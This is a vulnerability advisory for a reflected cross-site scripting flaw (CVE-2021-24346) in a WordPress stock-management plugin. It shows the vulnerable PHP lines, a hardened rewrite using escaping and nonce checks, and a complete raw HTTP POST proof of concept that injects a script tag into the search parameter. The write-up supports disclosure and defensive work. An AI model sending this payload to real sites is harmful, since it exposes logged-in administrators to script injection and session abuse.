Wp Plugin Stock In

Plugin Details

Plugin Name: wp-plugin : stock-in
Affected Version: 1.0.4 (and most probably lower versions, if any)
Vulnerability: Reflected Cross-Site Scripting (XSS)
Minimum Level of Access Required: Contributor
CVE Number: CVE-2021-24346
Identified by: Shreya Pohekar
WPScan Reference URL

Disclosure Timeline

Technical Details

The plugin has a search feature on its admin page (admin.php?page=stock_in), reachable by users with the Contributor role and above, that reads the POST parameter srch. The value is concatenated straight into an echo statement with no sanitization, validation or output escaping, so any HTML or script in srch is rendered as-is, which is a reflected XSS. The PoC below submits srch=<script>alert(1)</script> (URL-encoded in the request body). Because the payload travels in a POST body rather than a URL, using it against another user (for example an Administrator) requires that user to submit an attacker-supplied form targeting the page while logged in.

Vulnerable File: includes/settings.php

Vulnerable Code: settings.php#L118

117    $search = $_POST['srch'];
118    echo 'Showing Results for "'. $search .'"';
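As an added example (not the plugin's own code, and not its actual fix), here is the vulnerable pattern from includes/settings.php next to a hardened version of the same handler using WordPress's standard sanitize/escape and nonce APIs. The function names, the nonce action and field names, and the assumed capability (edit_posts, the capability Contributors have) are illustrative choices, not taken from the plugin.

```php
<?php
// Added illustration, not the stock-in plugin's code. The function names,
// nonce action/field names and the capability below are assumptions.

// Vulnerable pattern, as on settings.php#L117-118: raw POST data is echoed
// into the page, so srch=<script>alert(1)</script> executes in the browser.
function stock_in_show_search_vulnerable() {
    $search = $_POST['srch'];
    echo 'Showing Results for "' . $search . '"';
}

// Hardened version of the same handler.
function stock_in_show_search_hardened() {
    // Only act on an actual form submission.
    if ( ! isset( $_POST['srch'] ) ) {
        return;
    }

    // Capability check (assumed: edit_posts, which Contributors hold), so the
    // echo can never be reached by a lower-privileged or anonymous request.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'stock-in' ) );
    }

    // Nonce check: the POST must come from a form this site rendered for this
    // user, which blocks a cross-site form from delivering the payload.
    check_admin_referer( 'stock_in_search', 'stock_in_search_nonce' );

    // Sanitize on input: wp_unslash() undoes WordPress's magic-quote slashing,
    // sanitize_text_field() strips tags and normalises whitespace.
    $search = sanitize_text_field( wp_unslash( $_POST['srch'] ) );

    // Escape on output, at the exact point the value enters HTML. This line is
    // what actually closes the XSS; the steps above are defence in depth.
    echo 'Showing Results for "' . esc_html( $search ) . '"';
}

// The search form must emit the matching nonce field for check_admin_referer().
function stock_in_render_search_form() {
    echo '<form method="post">';
    wp_nonce_field( 'stock_in_search', 'stock_in_search_nonce' );
    echo '<input type="text" name="srch">';
    echo '<input type="submit" name="search" value="Search Product">';
    echo '</form>';
}
```

Of the three controls, only esc_html() removes the injection: sanitize_text_field() happens to strip the `<script>` tag here but is not an HTML-context escaper, and the nonce check stops cross-site delivery but would not stop a Contributor from reflecting a payload at themselves.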

PoC Screenshot

Exploit

POST /wp-admin/admin.php?page=stock_in HTTP/1.1
Host: 172.28.128.50
Content-Length: 66
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/admin.php?page=stock_in
Accept-Language: en-US,en;q=0.9
Cookie: wp-saving-post=9-check; spf-last-metabox-tab-12-_sptp_generator=_sptp_generator_1; spf-last-metabox-tab-14-_sptp_generator=_sptp_generator_1; wordpress_232395f24f6cff47569f2739c21385d6=contributor%7C1619547357%7CBTyRvctkKFcBVOKgwq7cnRkycNiIpHJch2IksOTCAxB%7C6bcf7335fe271c00e443d3210b6da18e2e9ce2a14b4306f45c99b2c640e83b1a; __eucookielaw=true; giveasap_110=5852970951c80fcaa281efebddaaf1b3; _ga=GA1.1.436418670.1617784311; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1619288085; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=contributor%7C1619547357%7CBTyRvctkKFcBVOKgwq7cnRkycNiIpHJch2IksOTCAxB%7Cd7d2d7515610bca092071e9a9154614a218be9fb52f1e0dcc65e73dcc537259e; wp-settings-time-5=1619374561
Connection: close

srch=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&search=Search+Product